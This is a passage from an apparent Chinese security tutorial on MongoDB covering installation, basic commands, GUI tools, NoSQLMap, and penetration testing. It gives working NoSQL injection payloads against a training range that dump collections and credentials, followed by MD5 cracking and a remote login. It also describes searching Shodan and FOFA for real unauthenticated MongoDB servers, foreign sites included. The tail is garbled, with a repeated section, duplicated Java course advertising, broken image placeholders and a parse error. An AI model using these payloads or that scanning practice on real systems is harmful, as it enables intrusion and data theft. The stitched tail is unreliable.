1)导入MongoDB密钥
=============
wget -qO - https://www.mongodb.org/static/pgp/server-4.4.asc | sudo apt-key add -
2)创建文件
======
echo “deb http://repo.mongodb.org/apt/debian buster/mongodb-org/4.4 main” | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list
3)更新软件包数据库
==========
sudo apt-get update
4)安装MongoDB软件包
==============
sudo apt-get install -y mongodb-org
4、Kali MongoDB服务配置
==================
1)启动MongoDB服务
=============
sudo systemctl start mongod
#查看端口信息
netstat -ntulp
2)检查服务状态
========
systemctl status mongod
3)停止MongoDB服务
=============
systemctl stop mongod
4)重启MongoDB服务
=============
systemctl restart mongod
5)设置允许远程连接可在远程访问该库信息
sudo vi /etc/mongod.conf
修改bindIP为0.0.0.0
network interfaces
net:
port: 27017
bindIp: 0.0.0.0
6)Kali 卸载MongoDB
================
删除软件包:
sudo apt-get purge mongodb-org*
可以通过下面命令来查看这些软件包文件,也可以检测是否删除完成
locate monodb-org
删除数据目录:
sudo rm -r /var/log/mongodb
sudo rm -r /var/lib/mongodb
三、MongoDB基本操作
=============
1、简单概念
======
MongoDB Shell 是 MongoDB 自带的交互式 Javascript shell ,用于对 MongoDB 进行操作和管理的交互式环境。进入到 MongoDB shell 后,直接在命令行窗口下输入 mongo 即可(前提是配置了环境变量),进入后默认连接到test(数据库)。由于自带交互式 Javascript shell ,可以直接在Mongo shell里进行一些简单的计算操作。
1+1
2
0x10+0x10
32
2、基本命令
======
1)查看数据库列表
=========
show dbs
2)查看当前数据库
=========
默认登陆后,当前数据库为test
db
3)创建数据库
=======
use xiguadb
这里创建的xiguadb数据库并没有显示在dbs中,需要在xiguadb数据库中添加文档即可
4)插入数据
======
db.xiguadb.insert({“name”:“john”})
插入文档后,dbs中显示了xiguadb数据库 注:这里文档是插入到名为xiguadb的集合中(自动创建的集合)
5)查看集合列表
========
当前数据库下的所有集合列表
show collections
show tables
在 MongoDB 中,不需要创建集合。当你插入一些文档时,MongoDB 会自动创建集合,一般同数据库名。
6)创建集合
======
db.createCollection(“lanmei”)
7)条件查询
======
先插入几条文档,再进行条件查询,pretty() 方法以格式化的方式来显示所有文档
db.lanmei.insert({“str”:“kkk”,“id”:“001”})
db.lanmei.insert({“num”:“1234567”,“id”:“002”})
db.lanmei.find({“num”:“1234567”}).pretty()
文档插入后会自动添加一个 _id 属性,为唯一标识符
8)删除文档
======
db.lanmei.remove({“str”:“kkk”})
删除键值对为str和kkk的文档
9)删除集合
======
db.lanmei.drop()
10)删除数据库
========
删除目前使用的数据库
db.dropDatabase()
11)用户登陆
=======
mongo --host 192.168.112.177 --port 27017 -u “mgtest” -p “123.com” --authenticationDatabase “admin”
或者
mongo -u mgtest -p 123.com localhost:27017/admin
四、MongoDB工具使用
=============
1、MongoDB Compass安装
===================
MongoDB compass 为 MongoDB 可视化工具,用于运维(可装可不装)
1)MongoDB Compass下载
===================
在默认的安装下,该文件会自动安装。也可以不勾选 install MongoDB compass ,到官网上去安装 下载链接:
https://www.mongodb.com/download-center/compass
选择最新版下载文件即可(zip、msi均可)
2)MongoDB Compass msi文件安装
=========================
3)MongoDB Compass使用
===================
启动进入程序后,点击Connect连接本地数据库
连接成功,可以看到本地MongoDB数据库信息
MongoDB Compass作为官方的一款可视化管理工具,使用体验还是挺不错的
2、Robo 3T工具
===========
Robo 3T是一款免费、开源的MongoDB可视化管理工具。其前身为Robomongo,后被3T Software Labs收购更名为Robo 3T。
下载地址: https://robomongo.org/ 蓝奏云下载:
https://wwe.lanzoui.com/iV7hXo5baej
1)安装Robo 3T
===========
下载好后,点击启动安装,默认下一步即可
2)启动Robo 3T,连接数据库
=================
启动Robo 3T程序,在连接界面选择左上角的Create选项,地址填本地地址及端口,连接进入
3)查询数据库内容
=========
这里以上面的演示的xiguadb数据库和lanmei集合为例。下图可以看到MongoDB数据库信息结构
db.lanmei.insert({“str”:“kkk”,“id”:“001”})
db.lanmei.insert({“num”:“1234567”,“id”:“002”})
在查询窗口中输入命令进行查询操作,可自行上手体验。
3、Navicat_MongoDB工具
====================
Navicat for MongoDB 提供高效图形化界面,用于MongoDB 数据库的管理、开发和监控。它能连接本地或远程的 MongoDB服务器。
中文下载地址:
http://www.navicat.com.cn/products/navicat-for-mongodb 英文下载地址: https://navicat.com/en/products/navicat-for-mongodb
下载好安装程序后,默认下一步安装
安装路径默认
进入主页面后,选择连接,选择 MongoDB ,填连接名 mongo (这个名是随意填的)
之后操作轻松上手
4、NoSQLMap工具
============
NoSQLMap是一款免费、开源的基于python2的脚本工具,用于审计和自动注入攻击,并利用 NoSQL 数据库和 Web 应用程序中的默认配置弱点,使用 NoSQL 来披露或克隆数据库中的数据。是市面上为数不多的支持MongoDB数据库SQL注入的工具。
项目地址:
https://github.com/codingo/NoSQLMap
1)安装
====
python setup.py install
2)开启该工具
=======
python nosqlmap.py
1-设置选项 2-NoSQL数据库访问攻击 3-NoSQL Web应用程序攻击 4-扫描匿名MongoDB访问 5-Change平台(目前:MongoDB) x-Exit
3)简单使用
======
选择1-设置选项
1-设置目标主机/IP(当前:未设置)
2-设置web应用端口(当前为80)
3-设置App路径(当前:未设置)
4-切换为HTTPS(当前关闭)
5-设置MongoDB端口(当前:27017)
6-设置HTTP请求方式(GET/POST) (Current: GET)
7-设置MongoDB/Shell本地IP(当前:未设置)
8-设置shell监听端口(当前:未设置)
9-设置详细模式(Current: OFF)
0-载入选项文件
a-从保存的Burp请求载入选项
b-保存选项文件
h-设置请求头
x-返回主菜单
这里以上面的mozhe靶场做演示,靶场地址为:
http://219.153.49.228:49818/new_list.php?id=1
填完相关配置项后,x返回主菜单,选择3NoSQL Web应用攻击
跑完一圈下来,注入全部失败。。
上手体验极差,毕竟这个脚本上次更新已经好久了,这款脚本比较鸡肋,还是手动注入行。
五、MongoDB漏洞复现
=============
MongoDB在3版本以后并未出现RCE漏洞,一般的MongoDB漏洞基本上都是信息泄露之类的,所以要RCE还要和其余漏洞进行配合,下面介绍的漏洞也基本上是关于信息泄露的。
1、MSF渗透MongoDB
==============
信息泄露
0x01 简介
=======
MSF中提供了一些用于渗透测试的脚本,输入下面命令查看和mongodb相关的渗透脚本。可以看到MSF中并没有很多关于MongoDB的脚本,唯一一个exploit也是对应2.x版本的MongoDB,现在基本没啥用,图中最有用的就属mongodb_login脚本了,它是一个扫描脚本,用于扫描目标主机是否开启MongoDB服务的27017端口及是否存在未授权访问漏洞
search mongodb
0x02 脚本使用
=========
以Win 2016上的MongoDB测试,其IP地址为:192.168.112.176,使用脚本mongodb_login,查看选项。
这个脚本一般就可以用于批量扫描MongoDB服务及未授权访问漏洞,可以进一步结合上面提及到的GUI管理工具(Compass、Robo 3T、Navicat)登陆进MongoDB查看到数据库信息造成信息泄露。
2、MongoDB数据库SQL注入漏洞
===================
信息泄露
0x01 简介
=======
复现地址:
https://www.mozhe.cn/bug/detail/YXlRYUJPYk1vQjAreHlweVAyMzVTUT09bW96aGUmozhe
SQL手工注入漏洞测试(MongoDB数据库),手工进行SQL注入测试,获取管理密码登录。
背景介绍:安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MongoDB,PHP代码对客户端提交的参数未做任何过滤。尽情地练习SQL手工注入吧。
附上源代码截图:
0x02 渗透过程
=========
1)页面信息
======
进入靶场后,发现一个通知页面,在地址栏可以看到id参数,很有可能是注入点
2)引号简单测试
========
在最后面添加单引号进行测试,页面发生了变化,说明存在SQL注入漏洞
id=1%27
3)简单分析页面源代码
===========
源代码重要部分:
查询语句,这里id值可控且没有经过过滤和限制
KaTeX parse error: Expected '}', got 'EOF' at end of input: …findOne({'id':'id’}); return data;";
#打印出数据库中title字段和content字段信息
<?php echo $obj['retval']['title'] ?> <?php echo $obj['retval']['content'] ?>4)构造链接测试
id=1’}); return ({title:1,content:'test
4)爆库名
=====
id=1’}); return ({title:tojson(db),content:'test
查询当前库名
db返回的是一个数组,回显为array,使用tojson()方法将其转为字符串类型
5)爆表名
=====
查询当前库的所有集合
id=1’}); return ({title:tojson(db.getCollectionNames()),content:'test
getCollectionNames()以数组形式返回所有集合,需要使用tojson()方法转字符串格式
直接查询第1个集合名
id=1’}); return ({title:db.getCollectionNames()[0],content:'test
6)爆字段信息
=======
可以爆出用户名和密码信息
id=1’}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'test
7)MD5解密
=======
MD5加密:a83cd5ad5ed3e1c5597441aaab289f5c
解密后 dsansda
8)远程登陆
======
Linux:
mongo --host 219.153.49.228 -u “mozhe” --authenticationDatabase “mozhe” -p’dsansda’
使用Robo 3T
填入登陆用户及密码
登陆后获取Key即可,不过这里始终登不进去,该IP连接不到,这个应该是靶场的问题。
六、MongoDB实战
===========
这部分主要是在网络搜索到一些存在未授权访问漏洞的MongoDB服务,查看到其数据,这部分较敏感,大致演示下即可
1)前往shodan、fofa等网络空间搜索引擎
========================
输入关键字product:"MongoDB"进行搜索
2)随便看是否存在未授权访问漏洞
================
在MSF中进行扫描检测(国外的站)
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
如果你觉得这些内容对你有帮助,可以扫码获取!!(备注Java获取)
最后
每年转战互联网行业的人很多,说白了也是冲着高薪去的,不管你是即将步入这个行业还是想转行,学习是必不可少的。作为一个Java开发,学习成了日常生活的一部分,不学习你就会被这个行业淘汰,这也是这个行业残酷的现实。
如果你对Java感兴趣,想要转行改变自己,那就要趁着机遇行动起来。或许,这份限量版的Java零基础宝典能够对你有所帮助。
《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
ngoDB渗透](https://i-blog.csdnimg.cn/blog_migrate/879fcfc8aeccccb3153e31b8c6aec454.jpeg)
2)随便看是否存在未授权访问漏洞
================
在MSF中进行扫描检测(国外的站)
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。[外链图片转存中…(img-kG9ChGNE-1713494907816)]
[外链图片转存中…(img-F8vNXZ2o-1713494907817)]
[外链图片转存中…(img-f3kK4Oce-1713494907817)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
如果你觉得这些内容对你有帮助,可以扫码获取!!(备注Java获取)
最后
每年转战互联网行业的人很多,说白了也是冲着高薪去的,不管你是即将步入这个行业还是想转行,学习是必不可少的。作为一个Java开发,学习成了日常生活的一部分,不学习你就会被这个行业淘汰,这也是这个行业残酷的现实。
如果你对Java感兴趣,想要转行改变自己,那就要趁着机遇行动起来。或许,这份限量版的Java零基础宝典能够对你有所帮助。
[外链图片转存中…(img-NVdRSrh3-1713494907818)]
《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!